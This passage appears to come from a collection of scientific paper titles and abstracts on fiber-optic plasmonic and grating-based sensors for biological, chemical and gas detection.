Fiber” technologies and devices with special focus on the design and development of advanced fiber optic nanoprobes for biological applications. Depending on the specific location where functional materials at micro and nanoscale are integrated, “Lab on Fiber Technology” is classified into three main paradigms: Lab on Tip (where functional materials are integrated onto the optical fiber tip), Lab around Fiber (where functional materials are integrated on the outer surface of optical fibers), and Lab in Fiber (where functional materials are integrated within the holey structure of specialty optical fibers). ::: ::: This work reviews the strategies, the main achievements and related devices developed in the “Lab on Fiber” roadmap, discussing perspectives and challenges that lie ahead, with special focus on biological sensing applications. --- paper_title: Wavelength-based localized surface plasmon resonance optical fiber biosensor paper_content: Abstract Two types of localized surface plasmon resonance (LSPR)-based optical fiber biosensors using gold nanospheres (GNSs) and gold nanorods (GNRs) have been developed and their performance characteristics evaluated and cross-compared successfully in this work. Based on the results obtained from the optimization of each of these types of biosensor and reported by the authors elsewhere, GNSs with a diameter of 60 nm and GNRs with an aspect ratio of 4.1 were specifically chosen in this work for the fabrication of two representative sensor probes, with an aim to create a highly sensitive and wavelength-based LSPR sensor to overcome the limitations arising from other intensity-based sensors. In order to develop effective LSPR biosensors, both GNSs and GRNs respectively were immobilized on an unclad surface of an optical fiber, prior to the functionalization with human IgG in order to create a device for the detection of anti-human IgG, at different concentrations. The experimental results obtained from tests carried out show that the sensitivities of GNSs and GNRs-based LSPR sensors to refractive index variation are 914 and 601 nm/RIU respectively; however as biosensors they have demonstrated the same detection limit of 1.6 nM for the detection of anti-human IgG. --- paper_title: Colloidal gold-modified optical fiber for chemical and biochemical sensing. paper_content: A novel class of fiber-optic evanescent-wave sensor was constructed on the basis of modification of the unclad portion of an optical fiber with self-assembled gold colloids. The optical properties and, hence, the attenuated total reflection spectrum of self-assembled gold colloids on the optical fiber changes with different refractive index of the environment near the colloidal gold surface. With sucrose solutions of increasing refractive index, the sensor response decreases linearly. The colloidal gold surface was also functionalized with glycine, succinic acid, or biotin to enhance the selectivity of the sensor. Results show that the sensor response decreases linearly with increasing concentration of each analyte. When the colloidal gold surface was functionalized with biotin, the detection limit of the sensor for streptavidin was 9.8 x 10(-11) M. Using this approach, we demonstrate proof-of-concept of a class of refractive index sensor that is sensitive to the refractive index of the environment near the colloidal gold surface and, hence, is suitable for label-free detection of molecular or biomolecular binding at the surface of gold colloids. --- paper_title: Universal scaling of the figure of merit of plasmonic sensors paper_content: We demonstrate an improvement by more than 1 order of magnitude of the figure of merit (FoM) of plasmonic nanoparticle sensors by means of the diffractive coupling of localized surface plasmon resonances. The coupling in arrays of nanoparticles leads to Fano resonances with narrow line widths known as surface lattice resonances, which are very suitable for the sensitive detection of small changes in the refractive index of the surroundings. We focus on the sensitivity to the bulk refractive index and find that the sensor FoM scales solely with the frequency difference between the surface lattice resonance and the diffracted order grazing to the surface of the array. This result, which can be extended to other systems with coupled resonances, enables the design of plasmonic sensors with a high FoM over broad spectral ranges with unprecedented accuracy. --- paper_title: Towards a Uniform Metrological Assessment of Grating-Based Optical Fiber Sensors: From Refractometers to Biosensors paper_content: A metrological assessment of grating-based optical fiber sensors is proposed with the aim of providing an objective evaluation of the performance of this sensor category. Attention was focused on the most common parameters, used to describe the performance of both optical refractometers and biosensors, which encompassed sensitivity, with a distinction between volume or bulk sensitivity and surface sensitivity, resolution, response time, limit of detection, specificity (or selectivity), reusability (or regenerability) and some other parameters of generic interest, such as measurement uncertainty, accuracy, precision, stability, drift, repeatability and reproducibility. Clearly, the concepts discussed here can also be applied to any resonance-based sensor, thus providing the basis for an easier and direct performance comparison of a great number of sensors published in the literature up to now. In addition, common mistakes present in the literature made for the evaluation of sensor performance are highlighted, and lastly a uniform performance assessment is discussed and provided. Finally, some design strategies will be proposed to develop a grating-based optical fiber sensing scheme with improved performance. --- paper_title: An enhanced LSPR fiber-optic nanoprobe for ultrasensitive detection of protein biomarkers. paper_content: A miniaturized, localized surface plasmon resonance (LSPR)-coupled fiber-optic (FO) nanoprobe is reported as a biosensor that is capable of label-free, sensitive detection of a cancer protein biomarker, free prostate specific antigen (f-PSA). The biosensor is based on the LSPR at the reusable dielectric-metallic hybrid interface with a robust, gold nano-disk array at the fiber end facet that is directly fabricated using EBL and metal lift-off process. The f-PSA has been detected with a mouse anti-human PSA monoclonal antibody (mAb) as a specific receptor linked with a self-assembled monolayer at the LSPR-FO facet surfaces. Experimental investigation and data analysis found near field refractive index (RI) sensitivity at ~226 nm/RIU with current LSPR-FO nanoprobe, and demonstrated the lowest limit of detection (LOD) at 100 fg/mL (~3 fM) of f-PSA in PBS solutions. The control experimentation using 5mg/mL bovine serum albumin in PBS and nonspecific surface test shows the excellent specificity and selectivity in the detection of f-PSA in PBS. These results present important progress towards a miniaturized, multifunctional fiber-optic technology that integrates informational communication and sensing function for developing a high performance, label-free, point-of-care (POC) device. --- paper_title: Annealing of gold nanostructures sputtered on glass substrate paper_content: The effects of annealing at 300 °C on gold nanostructures sputtered onto glass substrate were studied using XRD, SAXSees, the Van der Pauw method and ellipsometry. As-sputtered and annealed samples exhibit a different dependence of the gold lattice parameter on the sputtering time. With increasing sputtering time the average thickness of the layer and the size of gold crystallites increased. Another rapid enlargement of the crystallites is observed after annealing. The volume resistivity decreases rapidly with the increasing sputtering time for both, as-deposited and annealed structures. With increasing sputtering time initially discontinuous gold coverage changes gradually in a continuous one. Electrically continuous gold coverage on the as-sputtered and annealed samples exhibits the same concentration of free charge carriers and Hall mobility. Optical constants of as-deposited and annealed gold films determined by ellipsometry support resistivity measurements and clearly manifest the presence of plasmons in discontinuous films. --- paper_title: Bioinspired fabrication of optical fiber SPR sensors for immunoassays using polydopamine-accelerated electroless plating paper_content: This study presents a facile, rapid and effective method for the fabrication of optical fiber surface plasmon resonance (SPR) sensors via polydopamine (PDA)-accelerated electroless plating (ELP). The bioinspired PDA coating formed through the facile self-polymerization of dopamine (DA) was utilized as a versatile material for optic-fiber functionalization. Gold seeds were then rapidly and firmly adsorbed onto the PDA functional layer by amino and imino intermediates generated during the polymerization, and a gold film sensor was fabricated after metal deposition. The fabrication time of the sensor was decreased by 6–12 times, and the fabricated sensor exhibited higher sensitivity, better reproducibility and adhesion stability compared with those fabricated by the traditional ELP. Some key experimental parameters, including DA polymerization temperature, DA polymerization time, and plating time, were investigated in detail. The optimized sample exhibited high sensitivity ranging from 1391 nm per RIU to 5346 nm per RIU in the refractive index range of 1.328 to 1.386. Scanning electron microscopy images indicated that the sensor surface consisted of gold nanoparticles with a uniform particle size and an orderly arrangement, and the film thickness was approximately 60 nm. Another PDA layer was formed on the gold film for facile immobilization of antibodies. The sensor exhibited effective antibody immobilization ability and high sensitivity for human IgG detection over a wide range of concentrations from 0.5 to 40 μg mL−1, which indicate the potential applications of the fabricated sensor in immunoassays. --- paper_title: Thermal annealing of gold coated fiber optic surfaces for improved plasmonic biosensing paper_content: Abstract The morphological properties of thin gold (Au) films sputtered onto fiber optic (FO) substrates play an essential role in the overall performance of the sensing devices relying on surface plasmon resonance (SPR) effects. In this work, the influence of thermal treatments on the structural changes of the Au layer coated on the FO-SPR sensors, and consequently on their plasmonic biosensing performance, was systematically investigated. First, the sensors were exposed to different annealing temperatures for different durations and their sensitivity was evaluated by refractometric measurements in sucrose dilutions. The attained results suggested the optimal annealing conditions that were further validated using a split-plot experimental design statistical model. Room-temperature scanning tunneling microscopy (STM) imaging of the FO substrates revealed changes in the granular surface texture of the thermally treated Au films that could be linked to the observed increase in sensitivity of the treated sensors. The FO sensors, annealed under optimal conditions, were finally tested as label-free aptamer-based biosensors for the detection of Ara h 1 peanut allergen. Remarkably, the results demonstrated a superior biosensing performance of the thermally treated FO sensors, as the limit of detection (LOD) was improved with up to two orders of magnitude compared to a similar non-annealed FO-SPR sensor. This significant increase in sensitivity represents a major step forward in the facile and cost-effective preparation of FO-SPR sensors capable of label-free detection of various biomolecular targets. --- paper_title: Ion beam-induced enhanced adhesion of gold films deposited on glass paper_content: Abstract The metallisation of glass for decorative and/or functional purposes is now a well-established technique. The most popular methods are electroplating or sputter deposition. In order to obtain suitable adhesion, substrate pretreatment is a substantial part of a vapour-deposited coating that generally cannot be dispensed with. The pretreatment costs can reach the same order of magnitude as those associated with the actual coating process, or can even exceed them. In this work we studied the adhesion of Au thin films on glass. The substrates were pretreated by an ion-beam-mixing step, consisting of the deposition of Au/C bilayers or C/Au/C multilayers followed by Xe + implantation. After such preparation, the specimens were further coated (using a sputtering machine) with 150-nm-thick Au or Au-alloy films. Adhesion properties of the films were examined using a scratch tester in conjunction with scanning electron microscopy. It was observed that, without the ion-beam-mixing pretreatment, the coatings were poorly adherent. Strong adhesion enhancement was observed in the pretreated samples. The key mechanism envisaged to explain this is related to the formation of mixed SiC–Au phases at the interface region. Moreover, the mechanical properties of the pure and alloyed Au films were quantified by nano-indentation, and hardness results are in good agreement with a simple rigid-sphere model of substitutional hardening. --- paper_title: Silanization of solid surfaces via mercaptopropylsilatrane: a new approach of constructing gold colloid monolayers paper_content: Mercaptopropylsilatrane (MPS) was investigated as a novel self-assembled film on silica surfaces and also as a novel adhesive layer for the construction of a gold colloid monolayer on silica surfaces. We compare the preparation procedure and film quality of the MPS films to those of (3-mercaptopropyl)trimethoxysilane (MPTMS), which is commonly used for anchoring of gold nanoparticles on silica surfaces. The films were characterized by Fourier transform infrared spectroscopy, contact angle measurements, X-ray photoelectron spectroscopy, atomic force microscopy, and Ellman's reagent to determine surface mercaptan concentration. The process in preparing the MPS films involves more environmentally friendly aqueous or polar organic solvents, takes significantly shorter time (<30 min), and results in more uniform and reproducible films due to its insensitivity to moisture. The MPS films also have higher mercaptan surface density than that of the MPTMS films, resulting in higher saturation coverage of the gold colloid monolayers on the MPS-coated substrates. The higher ambient stability of the MPS films as compared to the MPTMS films is important for applications where sufficient durability of the self-assembled films under ambient conditions is required. Thus, mercaptosilatrane may have the potential to replace mercaptosilane for surface modification and as an adhesive layer for the construction of a noble metal colloid monolayer on oxide surfaces. --- paper_title: Oxides and nitrides as alternative plasmonic materials in the optical range [Invited] paper_content: As alternatives to conventional metals, new plasmonic materials offer many advantages in the rapidly growing fields of plasmonics and metamaterials. These advantages include low intrinsic loss, semiconductor-based design, compatibility with standard nanofabrication processes, tunability, and others. Transparent conducting oxides such as Al:ZnO, Ga:ZnO and indium-tin-oxide (ITO) enable many high-performance metamaterial devices operating in the near-IR. Transition-metal nitrides such as TiN or ZrN can be substitutes for conventional metals in the visible frequencies. In this paper we provide the details of fabrication and characterization of these new materials and discuss their suitability for a number of metamaterial and plasmonic applications. --- paper_title: Improved detection limits of protein optical fiber biosensors coated with gold nanoparticles. paper_content: The study presented herein investigates a novel arrangement of fiber-optic biosensors based on a tilted fiber Bragg grating (TFBG) coated with noble metal nanoparticles, either gold nanocages (AuNC) or gold nanospheres (AuNS). The biosensors constructed for this study demonstrated increased specificity and lowered detection limits for the target protein than a reference sensor without gold nanoparticles. The sensing film was fabricated by a series of thin-film and monolayer depositions to attach the gold nanoparticles to the surface of the TFBG using only covalent bonds. Though the gold nanoparticle integration had not yet been optimized for the most efficient coverage with minimum number of nanoparticles, binding AuNS and AuNC to the TFBG biosensor decreased the minimum detected target concentrations from 90 nM for the reference sensor, to 11 pM and 8 pM respectively. This improvement of minimum detection is the result of a reduced non-specific absorption onto the gold nanoparticles (by functionalization of the external surface of the gold nanoparticles), and of an optical field enhancement due to coupling between the photonic modes of the optical fiber and the localized surface plasmon resonances (LSPR) of the gold nanoparticles. This coupling also increased the sensitivity of the TFBG biosensor to changes in its local environment. The dissociation constant (Kd) of the target protein was also characterized with our sensing platform and found to be in good agreement with that of previous studies. --- paper_title: High resolution fiber optic surface plasmon resonance sensors with single-sided gold coatings paper_content: The surface plasmon resonance (SPR) performance of gold coated tilted fiber Bragg gratings (TFBG) at near infrared wavelengths is evaluated as a function of the angle between the tilt plane orientation and the direction of single- and double-sided, nominally 50 nm-thick gold metal depositions. Scanning electron microscope images show that the coating are highly non-uniform around the fiber circumference, varying between near zero and 50 nm. In spite of these variations, the experimental results show that the spectral signature of the TFBG-SPR sensors is similar to that of simulations based on perfectly uniform coatings, provided that the depositions are suitably oriented along the tilt plane direction. Furthermore, it is shown that even a (properly oriented) single-sided coating (over only half of the fiber circumference) is sufficient to provide a theoretically perfect SPR response with a bandwidth under 5 nm, and 90% attenuation. Finally, using a pair of adjacent TFBG resonances within the SPR response envelope, a power detection scheme is used to demonstrate a limit of detection of 3 × 10−6 refractive index units. --- paper_title: Identification and Quantification of Celery Allergens Using Fiber Optic Surface Plasmon Resonance PCR paper_content: Abstract: Accurate identification and quantification of allergens is key in healthcare, biotechnology and food quality and safety. Celery (Apium graveolens) is one of the most important elicitors of food allergic reactions in Europe. Currently, the golden standards to identify, quantify and discriminate celery in a biological sample are immunoassays and two-step molecular detection assays in which quantitative PCR (qPCR) is followed by a high-resolution melting analysis (HRM). In order to provide a DNA-based, rapid and simple detection method suitable for one-step quantification, a fiber optic PCR melting assay (FO-PCR-MA) was developed to determine different concentrations of celery DNA (1 pM–0.1 fM). The presented method is based on the hybridization and melting of DNA-coated gold nanoparticles to the FO sensor surface in the presence of the target gene (mannitol dehydrogenase, Mtd). The concept was not only able to reveal the presence of celery DNA, but also allowed for the cycle-to-cycle quantification of the target sequence through melting analysis. Furthermore, the developed bioassay was benchmarked against qPCR followed by HRM, showing excellent agreement (R2 = 0.96). In conclusion, this innovative and sensitive diagnostic test could further improve food quality control and thus have a large impact on allergen induced healthcare problems. --- paper_title: Enhanced Biosensor Platforms for Detecting the Atherosclerotic Biomarker VCAM1 Based on Bioconjugation with Uniformly Oriented VCAM1-Targeting Nanobodies paper_content: Surface bioconjugation of biomolecules has gained enormous attention for developing advanced biomaterials including biosensors. While conventional immobilization (by physisorption or covalent couplings using the functional groups of the endogenous amino acids) usually results in surfaces with low activity, reproducibility and reusability, the application of methods that allow for a covalent and uniformly oriented coupling can circumvent these limitations. In this study, the nanobody targeting Vascular Cell Adhesion Molecule-1 (NbVCAM1), an atherosclerotic biomarker, is engineered with a C-terminal alkyne function via Expressed Protein Ligation (EPL). Conjugation of this nanobody to azidified silicon wafers and Biacore™ C1 sensor chips is achieved via Copper(I)-catalyzed azide-alkyne cycloaddition (CuAAC) "click" chemistry to detect VCAM1 binding via ellipsometry and surface plasmon resonance (SPR), respectively. The resulting surfaces, covered with uniformly oriented nanobodies, clearly show an increased antigen binding affinity, sensitivity, detection limit, quantitation limit and reusability as compared to surfaces prepared by random conjugation. These findings demonstrate the added value of a combined EPL and CuAAC approach as it results in strong control over the surface orientation of the nanobodies and an improved detecting power of their targets-a must for the development of advanced miniaturized, multi-biomarker biosensor platforms. --- paper_title: Self-assembled Monolayers for Biosensors paper_content: The use of self-assembled monolayers (SAMs) in various fields of ::: research is rapidly growing. In particular, many biomedical fields apply ::: SAMs as an interface-layer between a metal surface and a solution or ::: vapour. This review summarises methods for the formation of SAMs upon the ::: most commonly used materials and techniques used for monolayer ::: characterisation. Emphasis will lie on uniform, mixed and functionalised ::: monolayers applied for immobilisation of biological components including ::: (oligo-)nucleotides, proteins, antibodies and receptors as well as ::: polymers. The application of SAMs in today’s research, together with ::: some applications will be discussed. --- paper_title: Optical biosensors for food quality and safety assurance—a review paper_content: Food quality and safety is a scientific discipline describing handling, preparation and storage of food in ways that prevent food borne illness. Food serves as a growth medium for microorganisms that can be pathogenic or cause food spoilage. Therefore, it is imperative to have stringent laws and standards for the preparation, packaging and transportation of food. The conventional methods for detection of food contamination based on culturing, colony counting, chromatography and immunoassay are tedious and time consuming while biosensors have overcome some of these disadvantages. There is growing interest in biosensors due to high specificity, convenience and quick response. Optical biosensors show greater potential for the detection of pathogens, pesticide and drug residues, hygiene monitoring, heavy metals and other toxic substances in the food to check whether it is safe for consumption or not. This review focuses on optical biosensors, the recent developments in the associated instrumentation with emphasis on fiber optic and surface plasmon resonance (SPR) based biosensors for detecting a range of analytes in food samples, the major advantages and challenges associated with optical biosensors. It also briefly covers the different methods employed for the immobilization of bio-molecules used in developing biosensors. --- paper_title: Free-Energy-Driven Lock/Open Assembly-Based Optical DNA Sensor for Cancer-Related microRNA Detection with a Shortened Time-to-Result paper_content: Quantification of cancer biomarker microRNAs (miRs) by exquisitely designed biosensors with a short time-to-result is of great clinical significance. With immobilized capture probes (CPs) and fluorescent-labeled signal probes (SPs), surface-involved sandwich-type (SST) biosensors serve as powerful tools for rapid, highly sensitive, and selective detection of miR in complex matrices as opposed to the conventional techniques. One key challenge for such SST biosensors is the existence of false-negative signals when the amount of miRs exceeds SPs in solution phase for a surface with a limited number of CP. To meet this challenge, a dynamic lock/open DNA assembly was designed to rationally program the pathway for miR/SP hybrids. Based on secondary structure analysis and free-energy assessment, a “locker” strand that partially hybridizes with target miR by two separated short arms was designed to stabilize target miR, preventing possible false-negative signals. The strategy was demonstrated on a fiber-based flu... --- paper_title: Facile screening of potential xenoestrogens by an estrogen receptor-based reusable optical biosensor. paper_content: The apparent increase in hormone-induced cancers and disorders of the reproductive tract has led to a growing demand for new technologies capable of screening xenoestrogens. We reported an estrogen receptor (ER)-based reusable fiber biosensor for facile screening estrogenic compounds in environment. The bioassay is based on the competition of xenoestrogens with 17β-estradiol (E2) for binding to the recombinant receptor of human estrogen receptor α (hERα) protein, leaving E2 free to bind to fluorophore-labeled anti-E2 monoclonal antibody. Unbound anti-E2 antibody then binds to the immobilized E2-protein conjugate on the fiber surface, and is detected by fluorescence emission induced by evanescent field. As expected, the stronger estrogenic activity of xenoestrogen would result in the weaker fluorescent signal. Three estrogen-agonist compounds, diethylstilbestrol (DES), 4-n-nonylphenol (NP) and 4-n-octylphenol (OP), were chosen as a paradigm for validation of this assay. The rank order of estrogenic potency determined by this biosensor was DES>OP>NP, which were consistent with the published results in numerous studies. Moreover, the E2-protein conjugate modified optical fiber was robust enough for over 300 sensing cycles with the signal recoveries ranging from 90% to 100%. In conclusion, the biosensor is reusable, reliable, portable and amenable to on-line operation, providing a facile, efficient and economical alternative to screen potential xenoestrogens in environment. --- paper_title: Non-antibody protein-based biosensors paper_content: Biosensors that depend on a physical or chemical measurement can be adversely affected by non-specific interactions. For example, a biosensor designed to measure specifically the levels of a rare analyte can give false positive results if there is even a small amount of interaction with a highly abundant but irrelevant molecule. To overcome this limitation, the biosensor community has frequently turned to antibody molecules as recognition elements because they are renowned for their exquisite specificity. Unfortunately antibodies can often fail when immobilised on inorganic surfaces, and alternative biological recognition elements are needed. This article reviews the available non-antibody-binding proteins that have been successfully used in electrical and micro-mechanical biosensor platforms. --- paper_title: Plasmonic Fiber Optic Refractometric Sensors: From Conventional Architectures to Recent Design Trends paper_content: Surface Plasmon Resonance (SPR) fiber sensor research has grown since the first demonstration over 20 year ago into a rich and diverse field with a wide range of optical fiber architectures, plasmonic coatings, and excitation and interrogation methods. Yet, the large diversity of SPR fiber sensor designs has made it difficult to understand the advantages of each approach. Here, we review SPR fiber sensor architectures, covering the latest developments from optical fiber geometries to plasmonic coatings. By developing a systematic approach to fiber-based SPR designs, we identify and discuss future research opportunities based on a performance comparison of the different approaches for sensing applications. --- paper_title: Small biomolecule immunosensing with plasmonic optical fiber grating sensor. paper_content: This study reports on the development of a surface plasmon resonance (SPR) optical fiber biosensor based on tilted fiber Bragg grating technology for direct detection of small biomarkers of interest for lung cancer diagnosis. Since SPR principle relies on the refractive index modifications to sensitively detect mass changes at the gold coated surface, we have proposed here a comparative study in relation to the target size. Two cytokeratin 7 (CK7) samples with a molecular weight ranging from 78 kDa to 2.6 kDa, respectively CK7 full protein and CK7 peptide, have been used for label-free monitoring. This work has first consisted in the elaboration and the characterization of a robust and reproducible bioreceptor, based on antibody/antigen cross-linking. Immobilized antibodies were then utilized as binding agents to investigate the sensitivity of the biosensor towards the two CK7 antigens. Results have highlighted a very good sensitivity of the biosensor response for both samples diluted in phosphate buffer with a higher limit of detection for the larger CK7 full protein. The most groundbreaking nature of this study relies on the detection of small biomolecule CK7 peptides in buffer and in the presence of complex media such as serum, achieving a limit of detection of 0.4 nM. --- paper_title: Polarized spectral combs probe optical fiber surface plasmons. paper_content: The high-order cladding modes of conventional single mode fiber come in semi-degenerate pairs corresponding to mostly radially or mostly azimuthally polarized light. Using tilted fiber Bragg gratings to excite these mode families separately, we show how plasmonic coupling to a thin gold coating on the surface of the fiber modifies the effective indices of the modes differently according to polarization and to mode order. In particular, we show the existence of a single “apolarized” grating resonance, with equal effective index for all input polarization states. This special resonance provides direct evidence of the excitation of a surface plasmon on the metal surface but also an absolute wavelength reference that allows for the precise localization of the most sensitive resonances in refractometric and biochemical sensing applications. Two plasmon interrogation methods are proposed, based on wavelength and amplitude measurements. Finally, we use a biotin-streptavidin biomolecular recognition experiment to demonstrate that differential spectral transmission measurements of a fine comb of cladding mode resonances in the vicinity of the apolarized resonance provide the most accurate method to extract information from plasmon-assisted Tilted fiber Bragg gratings, down to pM concentrations and at least 10−5 refractive index changes. --- paper_title: Surface plasmon resonance sensor interrogation with a double-clad fiber coupler and cladding modes excited by a tilted fiber Bragg grating. paper_content: We present a novel optical fiber surface plasmon resonance (SPR) sensor scheme using reflected guided cladding modes captured by a double-clad fiber coupler and excited in a gold-coated fiber with a tilted Bragg grating. This new interrogation approach, based on the reflection spectrum, provides an improvement in the operating range of the device over previous techniques. The device allows detection of SPR in the reflected guided cladding modes and also in the transmitted spectrum, allowing comparison with standard techniques. The sensor has a large operating range from 1.335 to 1.432 RIU, and a sensitivity of 510.5 nm/RIU. The device shows strong dependence on the polarization state of the guided core mode which can be used to turn the SPR on or off. --- paper_title: Tilted Fiber Bragg Grating Sensor with Graphene Oxide Coating for Humidity Sensing paper_content: In this study, we propose a tilted fiber Bragg grating (TFBG) humidity sensor fabricated using the phase mask method to produce a TFBG that was then etched with five different diameters of 20, 35, 50, 55 and 60 μm, after which piezoelectric inkjet technology was used to coat the grating with graphene oxide. According to the experimental results, the diameter of 20 μm yielded the best sensitivity. In addition, the experimental results showed that the wavelength sensitivity was −0.01 nm/%RH and the linearity was 0.996. Furthermore, the measurement results showed that when the relative humidity was increased, the refractive index of the sensor was decreased, meaning that the TFBG cladding mode spectrum wavelength was shifted. Therefore, the proposed graphene oxide film TFBG humidity sensor has good potential to be an effective relative humidity monitor. --- paper_title: Miniaturized Long-Period Fiber Grating Assisted Surface Plasmon Resonance Sensor paper_content: This paper presents the design and fabrication of a fiber-optic refractive index (RI) sensor. The novel concept employs a long-period fiber grating (LPG) to achieve surface plasmon resonance (SPR) of a single cladding mode at the gold-coated tip of a single-mode fiber. The sensor combines a high level of sensitivity, a miniaturized sensing area and simple intensity-based interrogation, and is intended for biosensing using portable point-of-care devices or highly integrated lab-on-chip systems. --- paper_title: Label-Free Detection of Cancer Biomarkers Using an In-Line Taper Fiber-Optic Interferometer and a Fiber Bragg Grating paper_content: A compact and label-free optical fiber sensor based on a taper interferometer cascaded with a fiber Bragg grating (FBG) is proposed and experimentally demonstrated for detection of a breast cancer biomarker (HER2). The tapered fiber-optic interferometer is extremely sensitive to the ambient refractive index (RI). In addition, being insensitive to the RI variation, the FBG can be applied as a temperature thermometer due to its independent response to the temperature. Surface functionalization to the sensor is carried out to achieve specific targeting of the unlabeled biomarkers. The result shows that the proposed sensor presents a low limit-of-detection (LOD) of 2 ng/mL, enabling its potentials of application in early diagnosis on the breast cancer. --- paper_title: Cladding mode coupling in highly localized fiber Bragg gratings: modal properties and transmission spectra paper_content: The spectral characteristics of a fiber Bragg grating (FBG) with a transversely inhomogeneous refractive index profile, differs con- siderably from that of a transversely uniform one. Transmission spectra of inhomogeneous and asymmetric FBGs that have been inscribed with focused ultrashort pulses with the so-called point-by-point technique are investigated. The cladding mode resonances of such FBGs can span a full octave in the spectrum and are very pronounced (deeper than 20dB). Using a coupled-mode approach, we compute the strength of resonant coupling and find that coupling into cladding modes of higher azimuthal order is very sensitive to the position of the modification in the core. Exploiting these properties allows precise control of such reflections and may lead to many new sensing applications. --- paper_title: A Novel Low-Power-Consumption All-Fiber-Optic Anemometer with Simple System Design paper_content: A compact and low-power consuming fiber-optic anemometer based on single-walled carbon nanotubes (SWCNTs) coated tilted fiber Bragg grating (TFBG) is presented. TFBG as a near infrared in-fiber sensing element is able to excite a number of cladding modes and radiation modes in the fiber and effectively couple light in the core to interact with the fiber surrounding mediums. It is an ideal in-fiber device used in a fiber hot-wire anemometer (HWA) as both coupling and sensing elements to simplify the sensing head structure. The fabricated TFBG was immobilized with an SWCNT film on the fiber surface. SWCNTs, a kind of innovative nanomaterial, were utilized as light-heat conversion medium instead of traditional metallic materials, due to its excellent infrared light absorption ability and competitive thermal conductivity. When the SWCNT film strongly absorbs the light in the fiber, the sensor head can be heated and form a "hot wire". As the sensor is put into wind field, the wind will take away the heat on the sensor resulting in a temperature variation that is then accurately measured by the TFBG. Benefited from the high coupling and absorption efficiency, the heating and sensing light source was shared with only one broadband light source (BBS) without any extra pumping laser complicating the system. This not only significantly reduces power consumption, but also simplifies the whole sensing system with lower cost. In experiments, the key parameters of the sensor, such as the film thickness and the inherent angle of the TFBG, were fully investigated. It was demonstrated that, under a very low BBS input power of 9.87 mW, a 0.100 nm wavelength response can still be detected as the wind speed changed from 0 to 2 m/s. In addition, the sensitivity was found to be -0.0346 nm/(m/s) under the wind speed of 1 m/s. The proposed simple and low-power-consumption wind speed sensing system exhibits promising potential for future long-term remote monitoring and on-chip sensing in practical applications. --- paper_title: Analysis of the Characteristics of PVA-Coated LPG-Based Sensors to Coating Thickness and Changes in the External Refractive Index paper_content: Recent research has shown that the transmission spectrum of a long period grating (LPG) written into an optical fiber is sensitive to the thickness and the refractive index (RI) of a thin layer deposited on it, a concept which forms the basis of a number of optical fiber sensors. The research reported herein is focused, in particular, on sensors of this type to create a design with an optimized thickness of the deposited layers of polyvinyl alcohol (PVA) on LPGs forming the basis of a highly sensitive probe. In creating such sensors, the dip-coating technique is used to minimize deleterious effects in the attenuation bands resulting from the inhomogeneity of the coated surface. In this paper, LPGs with different coating thicknesses are uniformly coated with thin layers of PVA and submerged in oils of known RI over the range from 1.30 to 1.70, to create effective RI probes. It is observed that when the coating thickness reaches a particular value that enables a substantial redistribution of the optical power within the overlay, a maximum sensitivity of the sensor can be achieved, even when the overlay has a RI higher than that of the cladding. The experimental results obtained through the characterization of the devices developed are shown to be in good agreement with the results of a theoretical model. --- paper_title: KLT-Based Interrogation Technique for FBG Multiplexed Sensor Tracking paper_content: The Karhunen–Loeve transform (KLT) is used to retrieve the wavelength information of several fiber Bragg gratings (FBGs) that are acting as a multiplexed sensor. The modulated light of a broadband source is launched to the FBG cascade in order to capture the electrical frequency response of the system. Thanks to dispersive media, the wavelengths of the FBGs are mapped in radio-frequency delays. Wavelength changes are determined by the amplitude change of the samples in the impulse response, a change which is followed by the eigenvalue calculated by the KLT routine. The use of the KLT routine reduces by three orders of magnitude the amount of points needed to have a subdegree resolution in temperature sensing, while keeping the accuracy almost intact. --- paper_title: Fiber grating assisted surface plasmon resonance for biochemical and electrochemical sensing paper_content: Surface Plasmon resonance (SPR) optical fiber sensors can be used as a cost-effective and relatively simple-toimplement alternative to well established bulky prism configurations for in-situ high sensitivity biochemical and electrochemical measurements. The miniaturized size and remote operation ability offer them a multitude of opportunities for single-point sensing in hard-to-reach spaces, even possibly in vivo. Grating-assisted and polarization control are two key properties of fiber-optic SPR sensors to achieve unprecedented sensitivities and limits of detection. The biosensor configuration presented here utilizes a nano-scale metal-coated tilted fiber Bragg grating (TFBG) imprinted in a commercial single mode fiber core with no structural modifications. Such sensor provides an additional resonant mechanism of high-density narrow cladding mode spectral combs that overlap with the broader absorption of the surface Plasmon for high accuracy interrogation. In this talk, we briefly review the principle, characterization and implementation of plasmonic TFBG sensors, followed by our recent developments of the “surface” and “localized” affinity studies of the biomolecules for real life problems, the electrochemical actives of electroactive biofilms for clean energy resources, and ultra-highly sensitive gas detection. --- paper_title: A novel immunosensor based on excessively tilted fiber grating coated with gold nanospheres improves the detection limit of Newcastle disease virus. paper_content: Abstract A novel immunosensor for detecting Newcastle disease virus (NDV) was developed using excessively tilted fiber grating (Ex-TFG) coated with gold nanospheres (AuNs). AuNs were coated on the Ex-TFG surface via Au–S bonds using 3-mercaptopropyltrimethoxysilane (MPTMS), and the activated staphylococcal protein A (SPA) was linked to AuNs by covalent bonds via cysteamine. AuNs greatly enhanced the impact of the analyte on the fiber cladding mode through the local surface Plasmon resonance (LSPR) effect, thus improving the detection limit and sensitivity of the immunosensor. Meanwhile, SPA enhanced the bioactivity of anti-NDV monoclonal antibodies (MAbs), thus promoting the effectiveness of specific binding events on the fiber surface. Immunoassays were performed by monitoring the resonance wavelength shift of the proposed sensor under NDV samples containing different particle amounts. Specificity was assessed, and clinical tests for NDV were performed by contrast experiments. Experimental results showed that the detection limit for NDV was about 5~10 times improved compared to that of reference Ex-TFG without AuN treatment. Moreover, the novel biosensor was reusable and could potentially be applied in clinic. --- paper_title: Graphene-Based Long-Period Fiber Grating Surface Plasmon Resonance Sensor for High-Sensitivity Gas Sensing paper_content: A graphene-based long-period fiber grating (LPFG) surface plasmon resonance (SPR) sensor is proposed. A monolayer of graphene is coated onto the Ag film surface of the LPFG SPR sensor, which increases the intensity of the evanescent field on the surface of the fiber and thereby enhances the interaction between the SPR wave and molecules. Such features significantly improve the sensitivity of the sensor. The experimental results demonstrate that the sensitivity of the graphene-based LPFG SPR sensor can reach 0.344 nm%-1 for methane, which is improved 2.96 and 1.31 times with respect to the traditional LPFG sensor and Ag-coated LPFG SPR sensor, respectively. Meanwhile, the graphene-based LPFG SPR sensor exhibits excellent response characteristics and repeatability. Such a SPR sensing scheme offers a promising platform to achieve high sensitivity for gas-sensing applications. --- paper_title: Optical hydrogen sensor based on etched fiber Bragg grating sputtered with Pd/Ag composite film paper_content: Abstract A novel fiber optical fiber hydrogen sensor based on etched fiber Bragg grating coated with Pd/Ag composite film is 